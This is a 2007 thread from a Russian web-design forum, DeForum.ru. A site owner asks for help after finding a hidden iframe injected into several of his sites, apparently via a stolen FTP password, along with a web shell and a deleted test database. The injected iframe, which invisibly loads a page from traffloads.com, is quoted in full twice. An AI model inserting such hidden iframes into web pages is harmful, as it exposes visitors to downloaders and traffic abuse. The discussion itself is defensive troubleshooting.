безопасность сайтов и не только @ DeForum.ru
DeДверь  
Логин:  
Пароль:  
  Автологин  
   
Разместить рекламу
Письмо админу
Правила | FAQ | *Поиск | Наша команда | Регистрация | Вход
 
 
 Страница 1 из 1 [ Сообщений: 7 ] 
*   Список форумов / Контекст / Теория » ответить » создать топик « | »
Автор Сообщение
fidukoff Муж.
Модератор
раздолбай-зануда
188
Сообщения: 8387
Зарегистрирован: 08.12.01
Откуда: Москва
Заголовок сообщения: безопасность сайтов и не только
Сообщение Добавлено: 19 Февраль 2007, 19:44:32 
вот какая проблема возникла, может кто что посоветует. Или сталкивался с таким?

Недавно обнаружил на одном из своих сайтов в коде примерно такую хрень:
Код:
<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>


кароче даунлоадер...

самое прикольное что потом такое же примерно появилось еще на паре сайтов. Если в первом случае я грешил на админа ихнего, то во втором случае кроме меня никто доступ туда не имеет...
техподдержка хостинга ответила что типа у меня сперли фтп пароль...

Вот теперь думаю, почему только 3 сайта из 30 заражены?
И у меня ли сперли или хостинг ломанули? причем 2 сразу...
а если сперли то как? Антивирус стоит, Avast, (переставил на NOD32) никогда не орал вроде, ну тока на почту, и ту удалял сразу...

И че делать? все пароли менять?

_________________
Life is short, paddle hard!!!
Обмен ссылками
Каяк-видео
Kurilshik
Goldmember
142
Сообщения: 12797
Зарегистрирован: 18.10.04
Откуда: Кожаное кресло
Сообщение Добавлено: 19 Февраль 2007, 21:54:49 
Хм. Лёх странно, он даже не пингуется

_________________

Портфолио - ЖЖ - Кулинарные рецепты - Блог о дизайне, уроки фотошоп

icq: 295346452 | Почта: info()alexey-popov.com

.
WayBe Муж.
соучастник
38
Сообщения: 781
Зарегистрирован: 16.09.06
Откуда: www.kaniv.net
Сообщение Добавлено: 20 Февраль 2007, 00:14:38 
traffloads.com - ничего так сайт...
почему даунловадер?
блин. ничерта не ясно. по ссылкешлёт на другой сайт, который ссылается на третий... кто-то раскручивается?
чёрный сео?

_________________
Мышка - музыкальний инструмент
Viс Муж.
новый человек
3
Сообщения: 20
Зарегистрирован: 16.09.05
Откуда: Питер
Сообщение Добавлено: 20 Февраль 2007, 00:53:37 

fidukoff писал(а):
вот какая проблема возникла, может кто что посоветует. Или сталкивался с таким?

Недавно обнаружил на одном из своих сайтов в коде примерно такую хрень:
Код:
<IFRAME src="http://traffloads.com/out.php?s_id=2" width=5 height=5 style="display:none"></IFRAME>





Недавно при проверке NODом обнаружил такую же хрень (только адрес сайта другой) во всех сохраненных из инета страницах на отцовском компьютере. Кроме того, заражены файлы справки и подобное... В общем, все html файлы.
Итого 12000 (двенадцать тысяч) зараженных файлов.
fidukoff Муж.
Модератор
раздолбай-зануда
188
Сообщения: 8387
Зарегистрирован: 08.12.01
Откуда: Москва
Сообщение Добавлено: 20 Февраль 2007, 02:00:58 
круто... не, на компе ПОЧТИ чисто... NOD32 отковырял пару троянов, два из которых были хммм... кряками...

может и СЕО... вопрос насколько интересно это серьезно... и как оценить масштаб разрушений :(

_________________
Life is short, paddle hard!!!
Обмен ссылками
Каяк-видео
fidukoff Муж.
Модератор
раздолбай-зануда
188
Сообщения: 8387
Зарегистрирован: 08.12.01
Откуда: Москва
Сообщение Добавлено: 20 Февраль 2007, 02:02:34 
да, на одном из сайтов грохнули тестовую базу... причем использвался веб shell? щас не помню как кличется. был закачен файлик, а дальше руление всем серваком через вебинтерфейс. Но файлик явно был закачен по фтп... по спертому паролю..
блин засада.

_________________
Life is short, paddle hard!!!
Обмен ссылками
Каяк-видео
diezel2005 Муж.
новый человек
16
Сообщения: 140
Зарегистрирован: 12.08.06
Откуда: Украина
Сообщение Добавлено: 20 Февраль 2007, 03:04:25 
http://traffloads.com/webalizer/usage_200701.html - там много удивительных хитов. Лидер - http://apelsinoff.net/

_________________
Не можешь вынести хамства? Сосчитай до десяти и вынеси хама.
*   Список форумов / Контекст / Теория « | » » ответить » создать топик
 Страница 1 из 1 [ Сообщений: 7 ] 
Показать сообщения за:   Поле сортировки  
Найти:
Перейти:  
Уровень доступа: Вы не можете начинать темы. Вы не можете отвечать на сообщения. Вы не можете редактировать свои сообщения. Вы не можете удалять свои сообщения. Вы не можете добавлять вложения.
cron


ООО ДеФорум
При использовании материалов сайта ссылка на DeForum.ru — обязательна.
Проект Павла Батурина ©2001-2077; // Powered by phpBB © 2013 phpBB Group
Rambler's Top100